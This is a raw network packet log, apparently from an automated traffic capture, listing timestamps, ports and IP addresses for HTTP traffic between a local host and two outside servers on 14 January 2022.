Jan 14, 2022 00:16:09.654803991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.654973984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.654988050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655112982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655237913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655253887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655422926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655438900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655549049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655689955 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655705929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655823946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655953884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.655971050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656130075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656143904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656261921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656317949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656450033 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656538963 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656694889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656717062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656868935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.656883001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.657051086 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.657067060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.657161951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.657175064 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.657387972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.657499075 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.657530069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.657779932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.657946110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658066034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658273935 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658287048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658471107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658488035 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658647060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658663034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658828020 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658844948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658912897 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.658945084 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.659060001 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.659126997 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.659142971 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.659336090 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.661588907 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.662017107 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.682365894 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682409048 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682447910 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682485104 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682497025 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.682524920 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682564020 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682579994 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.682604074 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682643890 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682661057 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.682682037 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682696104 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.682737112 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682782888 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682822943 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682841063 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.682861090 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682878017 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.682902098 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682940960 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682980061 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.682993889 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683021069 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683034897 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683058023 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683096886 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683136940 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683157921 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683182955 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683195114 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683223009 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683279037 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683317900 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683335066 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683358908 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683381081 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683399916 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683439016 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683479071 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683495998 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683517933 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683532000 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683554888 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683595896 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683634996 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683649063 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683675051 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683689117 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683717012 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683754921 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683794975 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683811903 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683834076 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683852911 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.683901072 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683939934 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683981895 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.683999062 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.684020996 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.684035063 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.684057951 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.684097052 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.684137106 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.684150934 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.684176922 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.684190989 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.684216976 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.684253931 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.684293032 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.684308052 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.684355974 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.698020935 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.698436022 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.698873043 CET	80	49910	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:09.699412107 CET	49910	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701159000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701185942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701291084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701338053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701520920 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701570034 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701613903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701711893 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701802015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701886892 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.701968908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702071905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702176094 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702325106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702403069 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702500105 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702604055 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702687979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702780008 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702862024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.702959061 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.703125954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.703141928 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.703263998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.703397989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.703442097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.727735996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.727915049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.727933884 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.728104115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.728116989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.728226900 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.728317976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.730268002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.730284929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.730469942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.730628014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.730729103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.730814934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.730905056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.731005907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.731271982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.731919050 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732125998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732150078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732343912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732359886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732532978 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732552052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732644081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732827902 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732844114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.732939959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733028889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733099937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733290911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733306885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733401060 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733556986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733573914 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733661890 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733747005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733886957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.733927965 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734030962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734128952 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734304905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734322071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734488010 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734500885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734589100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734756947 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734772921 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734869957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.734952927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735130072 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735146999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735236883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735375881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735506058 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735521078 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735626936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735713005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735871077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.735888004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.736052990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.736064911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.736167908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.736315012 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736334085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.736361027 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.736435890 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736478090 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736526012 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736526966 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.736526012 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.736587048 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.736589909 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736628056 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736666918 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736706972 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736725092 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.736743927 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736752987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.736762047 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.736783028 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736821890 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736859083 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736860991 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.736897945 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.736912012 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.736968040 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737008095 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737045050 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737061024 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737086058 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737104893 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737127066 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737166882 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737206936 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737238884 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737243891 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737251043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.737258911 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.737272024 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737283945 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737323046 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737335920 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737360954 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737401009 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737418890 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737438917 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737478971 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737514019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.737530947 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737546921 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737587929 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737626076 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737643003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.737649918 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737674952 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737677097 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737705946 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.737715960 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737752914 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737778902 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737792015 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737831116 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737881899 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737893105 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737910032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.737931013 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.737946033 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.737971067 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738009930 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738046885 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738059044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.738075018 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738085032 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738106012 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738126040 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738163948 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738183022 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738204956 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738240957 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738281012 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738318920 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738320112 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738329887 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738359928 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738360882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.738399982 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738414049 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738439083 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738477945 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738518953 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738540888 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738555908 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738573074 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738603115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.738604069 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738650084 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738662958 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738688946 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738725901 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738744974 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.738753080 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.738764048 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738765955 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738804102 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738817930 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738843918 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738903046 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.738909006 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738950014 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738986015 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.738990068 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.738997936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:09.739007950 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739025116 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739063978 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739100933 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739120960 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739141941 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739155054 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739181042 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739233017 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739273071 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739289045 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739311934 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739332914 CET	49909	80	192.168.2.4	93.189.42.167
Jan 14, 2022 00:16:09.739348888 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739387989 CET	80	49909	93.189.42.167	192.168.2.4
Jan 14, 2022 00:16:09.739425898 CET	80	49909	93.189.42.167	192.168.2.4
